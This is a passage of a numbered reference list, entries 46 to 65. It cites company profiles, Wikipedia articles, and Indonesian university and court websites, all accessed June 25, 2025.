46. Spotify – 2025 Company Profile, Team, Funding, Competitors & Financials – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/spotify/__Ca_zlUgx_WLZhdMnrFT5gl0QhuYKmazqhoU9ekDPRkw
47. Spotify – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Spotify
48. Bybit history – Regulated United Europe, accessed June 25, 2025, https://rue.ee/blog/bybit-history/
49. About Mengly J. Quach Education, accessed June 25, 2025, https://mjqeducation.edu.kh/about-mengly-j--quach-education
50. Upstox 2025 Company Profile: Valuation, Funding & Investors | PitchBook, accessed June 25, 2025, https://pitchbook.com/profiles/company/108750-70
51. Upstox | Overview, Mission, Vision, Values, Principles – workat.tech, accessed June 25, 2025, https://workat.tech/company/upstox
52. Kleinanzeigen – 2025 Company Profile & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/kleinanzeigen/__lYxHIJtDKccquPkDAz-5M0UORd5mFHyCehkwbGwQCxQ
53. Fling (social network) – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Fling_(social_network)
54. Constitutional Court of Indonesia – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Constitutional_Court_of_Indonesia
55. Dubsmash – 2025 Company Profile, Funding & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/dubsmash/__NqQ7Jj1fKum4egOx-6hXOvMXu7Uq7uRb5b80rTN4NXU
56. UIN Siber Syekh Nurjati Cirebon, accessed June 25, 2025, https://uinssc.ac.id/
57. Company Profile IAIN Syekh Nurjati Cirebon – YouTube, accessed June 25, 2025, https://www.youtube.com/watch?v=ItyDCY6yyJ4
58. Profile – Maca – Perpustakaan UIN Siber Syekh Nurjati Cirebon, accessed June 25, 2025, https://perpustakaan.uinssc.ac.id/profile-2/
59. Central Java – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Central_Java
60. Report: Kraken Business Breakdown & Founding Story | Contrary …, accessed June 25, 2025, https://research.contrary.com/company/kraken#:~:text=Kraken%20is%20a%20global%20cryptocurrency,costs%20for%20high%2Dvolume%20trades.
61. PA Kuala Kurun: Welcome to |, accessed June 25, 2025, https://pa-kualakurun.go.id/
62. Chapter III: Profile of the Krui Religious Court, West Lampung (bab iii profil pengadilan agama krui lampung barat), accessed June 25, 2025, https://repository.uinib.ac.id/17462/2/Alfi%20Syahputra%20NIM%201813010051%20BAB%20III.pdf
63. We Are Redwood – Redwood Software, accessed June 25, 2025, https://www.redwood.com/about-us/
64. www.kdl-logistics.com, accessed June 25, 2025, https://www.kdl-logistics.com/en/
65. K.A.L.A.D. & CO LTD overview – Find and update company information – GOV.UK, accessed June 25, 2025, https://find-and-update.company-information.service.gov.uk/company/09481642